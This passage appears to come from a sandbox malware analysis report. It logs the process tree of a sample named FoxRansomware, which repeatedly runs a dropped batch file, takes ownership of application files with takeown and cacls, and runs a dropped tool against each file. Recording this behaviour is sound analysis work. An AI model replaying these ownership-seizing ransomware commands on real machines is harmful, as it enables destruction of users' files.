    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4284
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      Executes dropped EXE
      PID:4292
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:4352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:4428
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  - Loads dropped DLL
  PID:4488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    - Modifies file permissions
    PID:4532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4540
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:4548
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  - Loads dropped DLL
  PID:4600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "create_form.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4648
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "create_form.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:4656
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4688
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
  2⤵
  - Loads dropped DLL
  PID:4724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    - Modifies file permissions
    PID:4768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "info.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "info.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:4788
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  - Loads dropped DLL
  PID:4836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    PID:4880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4896
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:4904
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  - Loads dropped DLL
  PID:4960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "trash.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "trash.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:5012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    - Modifies file permissions
    PID:4996
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  - Loads dropped DLL
  PID:5076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:5104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2600
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:3276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  - Loads dropped DLL
  PID:3044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    - Modifies file permissions
    PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2236
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:3996
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  - Loads dropped DLL
  PID:3412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2828
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      Executes dropped EXE
      PID:2372
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  - Loads dropped DLL
  PID:3724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    - Modifies file permissions
    PID:2248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can.hyp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1792
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "can.hyp" -nobanner
      4⤵
      Executes dropped EXE
      PID:3368
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  - Loads dropped DLL
  PID:2692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    - Modifies file permissions
    PID:4056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3992
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      Executes dropped EXE
      PID:2112
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  - Loads dropped DLL
  PID:1960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    - Modifies file permissions
    PID:776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  - Loads dropped DLL
  PID:3852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:3732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    - Modifies file permissions
    PID:2624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3816
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:3836
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  - Loads dropped DLL
  PID:2620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:3496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "overlay.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2076
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "overlay.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:712
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  - Loads dropped DLL
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:3920
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  - Loads dropped DLL
  PID:3544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1696
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "background.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:2672
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  - Loads dropped DLL
  PID:3948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2240
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  - Loads dropped DLL
  PID:2256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  2⤵
  - Loads dropped DLL
  PID:2060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AUMProduct.cer" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "AUMProduct.cer" -nobanner
      4⤵
      Executes dropped EXE
      PID:440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:312
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1824
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:2876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  2⤵
  - Loads dropped DLL
  PID:3140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
    3⤵
    PID:592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
    3⤵
    PID:3088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "email_all.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1156
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "email_all.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:2304
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  2⤵
  - Loads dropped DLL
  PID:1688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"
    3⤵
    PID:800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "open_original_form.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "open_original_form.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:3316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  - Loads dropped DLL
  PID:3768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "rss.gif" -nobanner
    3⤵
